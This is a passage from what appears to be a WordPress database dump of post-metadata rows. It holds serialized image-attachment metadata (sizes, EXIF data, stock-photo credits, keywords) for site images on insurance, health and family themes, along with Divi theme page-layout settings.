me-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73322;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-480x271.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34561;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:22:\"md3d - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:21:\"Life insurance policy\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:14:\"life insurance\";i:1;s:9:\"insurance\";i:2;s:4:\"life\";i:3;s:6:\"policy\";i:4;s:11:\"application\";i:5;s:8:\"document\";i:6;s:4:\"form\";i:7;s:14:\"life assurance\";i:8;s:6:\"insure\";i:9;s:7:\"insured\";i:10;s:8:\"accident\";i:11;s:4:\"risk\";i:12;s:8:\"contract\";i:13;s:7:\"signpen\";i:14;s:8:\"fountain\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"72\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(1030,315,'_et_pb_post_hide_nav','default'),(1031,315,'_et_pb_page_layout','et_right_sidebar'),(1032,315,'_et_pb_side_nav','off'),(1027,315,'_et_post_bg_color','#ffffff'),(1028,315,'_et_post_bg_layout','light'),(1029,315,'_et_pb_show_title','on'),(1026,315,'_thumbnail_id','299'),(913,278,'_thumbnail_id','280'),(914,278,'_et_post_bg_color','#ffffff'),(915,278,'_et_post_bg_layout','light'),(916,278,'_et_pb_show_title','on'),(917,278,'_et_pb_post_hide_nav','default'),(918,278,'_et_pb_page_layout','et_right_sidebar'),(919,278,'_et_pb_side_nav','off'),(929,278,'_et_pb_use_builder',''),(930,278,'_et_pb_first_image',''),(931,278,'_et_pb_truncate_post',''),(932,278,'_et_pb_truncate_post_date',''),(933,278,'_et_pb_old_content',''),(949,295,'_edit_lock','1679247872:3'),(1040,315,'_et_pb_old_content',''),(950,295,'_edit_last','3'),(951,296,'_wp_attached_file','2023/03/closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1.jpg'),(952,296,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:562;s:4:\"file\";s:77:\"2023/03/closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1.jpg\";s:8:\"filesize\";i:270168;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31058;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24785;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62031;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37399;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38082;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46401;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41745;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-980x551.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79047;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:77:\"closeup-view-of-an-ecg-ekg-monitor-on-a-operating-room-1000x562-1-480x270.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41546;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:24:\"lucadp - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:54:\"closeup view of an ecg ekg monitor on a operating room\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:15:\"ecg ekg monitor\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:46:{i:0;s:3:\"ecg\";i:1;s:10:\"cardiogram\";i:2;s:6:\"cardio\";i:3;s:11:\"electronics\";i:4;s:8:\"hospital\";i:5;s:10:\"monitoring\";i:6;s:7:\"monitor\";i:7;s:4:\"beat\";i:8;s:7:\"cardiac\";i:9;s:11:\"cardiograph\";i:10;s:10:\"cardiology\";i:11;s:5:\"chart\";i:12;s:6:\"clinic\";i:13;s:8:\"computer\";i:14;s:9:\"diagnosis\";i:15;s:7:\"display\";i:16;s:17:\"electrocardiogram\";i:17;s:9:\"emergency\";i:18;s:9:\"equipment\";i:19;s:2:\"er\";i:20;s:9:\"frequency\";i:21;s:5:\"graph\";i:22;s:10:\"healthcare\";i:23;s:10:\"heart beat\";i:24;s:7:\"medical\";i:25;s:8:\"pressure\";i:26;s:5:\"pulse\";i:27;s:4:\"rate\";i:28;s:7:\"science\";i:29;s:6:\"screen\";i:30;s:6:\"signal\";i:31;s:4:\"wave\";i:32;s:8:\"waveform\";i:33;s:5:\"trace\";i:34;s:10:\"technology\";i:35;s:7:\"surgery\";i:36;s:6:\"health\";i:37;s:14:\"operating room\";i:38;s:3:\"ekg\";i:39;s:4:\"test\";i:40;s:2:\"3d\";i:41;s:6:\"nobody\";i:42;s:6:\"render\";i:43;s:8:\"close-up\";i:44;s:7:\"closeup\";i:45;s:7:\"graphic\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"82\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(953,295,'_thumbnail_id','296'),(954,295,'_et_post_bg_color','#ffffff'),(955,295,'_et_post_bg_layout','light'),(956,295,'_et_pb_show_title','on'),(957,295,'_et_pb_post_hide_nav','default'),(958,295,'_et_pb_page_layout','et_right_sidebar'),(959,295,'_et_pb_side_nav','off'),(963,295,'_et_pb_use_builder',''),(964,295,'_et_pb_first_image',''),(965,295,'_et_pb_truncate_post',''),(966,295,'_et_pb_truncate_post_date',''),(967,295,'_et_pb_old_content',''),(972,298,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:64:\"2023/03/Military-Soldier-Veteran-Child-and-Spouse-1000x667-1.jpg\";s:8:\"filesize\";i:494247;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40944;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31288;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100327;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49787;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52428;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67893;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66432;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137388;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:64:\"Military-Soldier-Veteran-Child-and-Spouse-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59894;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:29:\"michaeljung - stock.adobe.com\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:56:\"happy military family of three relaxing together at home\";s:17:\"created_timestamp\";s:10:\"1448185875\";s:9:\"copyright\";s:31:\"©michaeljung - stock.adobe.com\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:42:\"military family of three relaxing together\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:98:{i:0;s:6:\"family\";i:1;s:6:\"mother\";i:2;s:6:\"father\";i:3;s:8:\"daughter\";i:4;s:3:\"hug\";i:5;s:8:\"military\";i:6;s:4:\"home\";i:7;s:13:\"united states\";i:8;s:7:\"reunite\";i:9;s:4:\"sofa\";i:10;s:7:\"soldier\";i:11;s:2:\"us\";i:12;s:5:\"couch\";i:13;s:4:\"army\";i:14;s:5:\"house\";i:15;s:7:\"parents\";i:16;s:7:\"veteran\";i:17;s:8:\"american\";i:18;s:4:\"love\";i:19;s:3:\"kid\";i:20;s:5:\"leave\";i:21;s:7:\"indoors\";i:22;s:7:\"america\";i:23;s:8:\"property\";i:24;s:3:\"USA\";i:25;s:3:\"man\";i:26;s:5:\"woman\";i:27;s:6:\"marine\";i:28;s:4:\"girl\";i:29;s:7:\"married\";i:30;s:7:\"reunion\";i:31;s:9:\"caucasian\";i:32;s:8:\"portrait\";i:33;s:5:\"child\";i:34;s:6:\"female\";i:35;s:4:\"male\";i:36;s:5:\"adult\";i:37;s:8:\"handsome\";i:38;s:9:\"beautiful\";i:39;s:7:\"sitting\";i:40;s:9:\"childhood\";i:41;s:6:\"modern\";i:42;s:6:\"lovely\";i:43;s:5:\"young\";i:44;s:6:\"little\";i:45;s:10:\"camouflage\";i:46;s:8:\"together\";i:47;s:9:\"lifestyle\";i:48;s:7:\"uniform\";i:49;s:6:\"family\";i:50;s:6:\"mother\";i:51;s:6:\"father\";i:52;s:8:\"daughter\";i:53;s:3:\"hug\";i:54;s:8:\"military\";i:55;s:4:\"home\";i:56;s:13:\"united states\";i:57;s:7:\"reunite\";i:58;s:4:\"sofa\";i:59;s:7:\"soldier\";i:60;s:2:\"us\";i:61;s:5:\"couch\";i:62;s:4:\"army\";i:63;s:5:\"house\";i:64;s:7:\"parents\";i:65;s:7:\"veteran\";i:66;s:8:\"american\";i:67;s:4:\"love\";i:68;s:3:\"kid\";i:69;s:5:\"leave\";i:70;s:7:\"indoors\";i:71;s:7:\"america\";i:72;s:8:\"property\";i:73;s:3:\"usa\";i:74;s:3:\"man\";i:75;s:5:\"woman\";i:76;s:6:\"marine\";i:77;s:4:\"girl\";i:78;s:7:\"married\";i:79;s:7:\"reunion\";i:80;s:9:\"caucasian\";i:81;s:8:\"portrait\";i:82;s:5:\"child\";i:83;s:6:\"female\";i:84;s:4:\"male\";i:85;s:5:\"adult\";i:86;s:8:\"handsome\";i:87;s:9:\"beautiful\";i:88;s:7:\"sitting\";i:89;s:9:\"childhood\";i:90;s:6:\"modern\";i:91;s:6:\"lovely\";i:92;s:5:\"young\";i:93;s:6:\"little\";i:94;s:10:\"camouflage\";i:95;s:8:\"together\";i:96;s:9:\"lifestyle\";i:97;s:7:\"uniform\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"80\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(973,299,'_wp_attached_file','2023/03/Stay-safe-Halloween-autumn-decoration-1000x667-1.jpg'),(974,299,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:60:\"2023/03/Stay-safe-Halloween-autumn-decoration-1000x667-1.jpg\";s:8:\"filesize\";i:752066;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53062;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40664;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138472;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65159;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68984;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89901;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82741;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192071;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:60:\"Stay-safe-Halloween-autumn-decoration-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80029;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:30:\"anna.stasiia - stock.adobe.com\";s:6:\"camera\";s:11:\"NIKON D3500\";s:7:\"caption\";s:187:\"Stay safe. Text in white light box, with a background of sweater, dried leaves halloween autumn decoration. Coronavirus devices. Social distancing. Protection against pandemics. Cozy home\";s:17:\"created_timestamp\";s:10:\"1602171117\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"0.3\";s:5:\"title\";s:176:\"Stay safe. Text in white light box, with a background of sweater, dried leaves halloween autumn decoration. Coronavirus devices. Social distancing. Protection against pandemics\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:4:\"home\";i:1;s:11:\"coronavirus\";i:2;s:4:\"text\";i:3;s:4:\"sign\";i:4;s:9:\"isolation\";i:5;s:7:\"message\";i:6;s:8:\"lightbox\";i:7;s:5:\"covid\";i:8;s:4:\"cozy\";i:9;s:7:\"hashtag\";i:10;s:7:\"sweater\";i:11;s:9:\"halloween\";i:12;s:4:\"leaf\";i:13;s:6:\"leaves\";i:14;s:8:\"pandemic\";i:15;s:5:\"virus\";i:16;s:10:\"quarantine\";i:17;s:8:\"outbreak\";i:18;s:8:\"covid-19\";i:19;s:9:\"stay safe\";i:20;s:10:\"prevention\";i:21;s:7:\"concept\";i:22;s:7:\"protect\";i:23;s:5:\"ghost\";i:24;s:10:\"decoration\";i:25;s:7:\"pumpkin\";i:26;s:12:\"corona virus\";i:27;s:5:\"light\";i:28;s:8:\"epidemic\";i:29;s:7:\"disease\";i:30;s:5:\"media\";i:31;s:7:\"indoors\";i:32;s:7:\"letters\";i:33;s:3:\"bat\";i:34;s:6:\"safety\";i:35;s:10:\"protection\";i:36;s:5:\"words\";i:37;s:6:\"health\";i:38;s:9:\"stay home\";i:39;s:9:\"2019-ncov\";i:40;s:9:\"infection\";i:41;s:7:\"warning\";i:42;s:4:\"safe\";i:43;s:12:\"stay at home\";i:44;s:11:\"health care\";i:45;s:17:\"social distancing\";i:46;s:15:\"self quarantine\";i:47;s:5:\"relax\";i:48;s:13:\"home interior\";i:49;s:9:\"cozy home\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"81\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(975,300,'_wp_attached_file','2023/03/grandchild-whispering-to-her-smiling-grandfather-1000x667-1.jpg'),(976,300,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:71:\"2023/03/grandchild-whispering-to-her-smiling-grandfather-1000x667-1.jpg\";s:8:\"filesize\";i:528729;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38473;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28257;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104716;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47975;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51342;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68787;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72667;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145979;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:71:\"grandchild-whispering-to-her-smiling-grandfather-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59522;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:32:\"LIGHTFIELD STUDIOS - stock.adobe\";s:6:\"camera\";s:10:\"NIKON D810\";s:7:\"caption\";s:112:\"little adorable african american grandchild whispering to her smiling grandfather while sitting on bench in park\";s:17:\"created_timestamp\";s:10:\"1500396923\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"150\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:64:\"little adorable african american grandchild whispering to her sm\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:41:{i:0;s:64:\"leisure, smiling, adult, people, park, outdoors, child, family, \";i:1;s:7:\"leisure\";i:2;s:7:\"smiling\";i:3;s:5:\"adult\";i:4;s:6:\"people\";i:5;s:4:\"park\";i:6;s:8:\"outdoors\";i:7;s:5:\"child\";i:8;s:6:\"family\";i:9;s:9:\"childhood\";i:10;s:3:\"sit\";i:11;s:3:\"kid\";i:12;s:9:\"newspaper\";i:13;s:4:\"talk\";i:14;s:4:\"read\";i:15;s:8:\"together\";i:16;s:12:\"togetherness\";i:17;s:7:\"whisper\";i:18;s:6:\"senior\";i:19;s:5:\"bench\";i:20;s:8:\"daylight\";i:21;s:11:\"grandfather\";i:22;s:10:\"grandchild\";i:23;s:13:\"granddaughter\";i:24;s:11:\"grandparent\";i:25;s:12:\"relationship\";i:26;s:7:\"daytime\";i:27;s:10:\"summertime\";i:28;s:6:\"gossip\";i:29;s:9:\"youngster\";i:30;s:9:\"gossiping\";i:31;s:8:\"girlhood\";i:32;s:7:\"grandpa\";i:33;s:8:\"granddad\";i:34;s:8:\"grandkid\";i:35;s:10:\"copy space\";i:36;s:16:\"african american\";i:37;s:10:\"spend time\";i:38;s:13:\"natural light\";i:39;s:9:\"black man\";i:40;s:10:\"black girl\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"76\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(977,301,'_wp_attached_file','2023/03/Group-of-friends-at-cafe-having-coffee-together-1000x660-1.jpg'),(978,301,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:600;s:4:\"file\";s:70:\"2023/03/Group-of-friends-at-cafe-having-coffee-together-1000x660-1.jpg\";s:8:\"filesize\";i:505646;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40698;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30525;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106849;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52782;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56340;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75256;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73541;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-980x588.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147102;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:70:\"Group-of-friends-at-cafe-having-coffee-together-1000x660-1-480x288.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61602;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:28:\"Jacob Lund - stock.adobe.com\";s:6:\"camera\";s:15:\"Canon EOS 5DS R\";s:7:\"caption\";s:107:\"Young people sitting at cafe table and having coffee together. Group of friends making a toast with coffee.\";s:17:\"created_timestamp\";s:10:\"1491731388\";s:9:\"copyright\";s:20:\"Jacob Ammentorp Lund\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:47:\"Group of friends at cafe having coffee together\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:38:{i:0;s:7:\"african\";i:1;s:3:\"bar\";i:2;s:9:\"beautiful\";i:3;s:4:\"cafe\";i:4;s:6:\"casual\";i:5;s:9:\"caucasian\";i:6;s:6:\"coffee\";i:7;s:3:\"cup\";i:8;s:5:\"drink\";i:9;s:7:\"females\";i:10;s:4:\"four\";i:11;s:10:\"friendship\";i:12;s:3:\"fun\";i:13;s:5:\"group\";i:14;s:5:\"happy\";i:15;s:7:\"holding\";i:16;s:10:\"horizontal\";i:17;s:7:\"indoors\";i:18;s:8:\"laughing\";i:19;s:10:\"lifestyles\";i:20;s:7:\"looking\";i:21;s:5:\"males\";i:22;s:7:\"meeting\";i:23;s:3:\"men\";i:24;s:11:\"multiracial\";i:25;s:6:\"people\";i:26;s:4:\"real\";i:27;s:10:\"restaurant\";i:28;s:7:\"reunion\";i:29;s:4:\"shop\";i:30;s:7:\"sitting\";i:31;s:7:\"smiling\";i:32;s:5:\"table\";i:33;s:7:\"talking\";i:34;s:8:\"toasting\";i:35;s:12:\"togetherness\";i:36;s:5:\"women\";i:37;s:5:\"young\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"76\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(979,302,'_wp_attached_file','2023/03/credit-score-screen-of-smartphone-1000x667-1.jpg'),(980,302,'_wp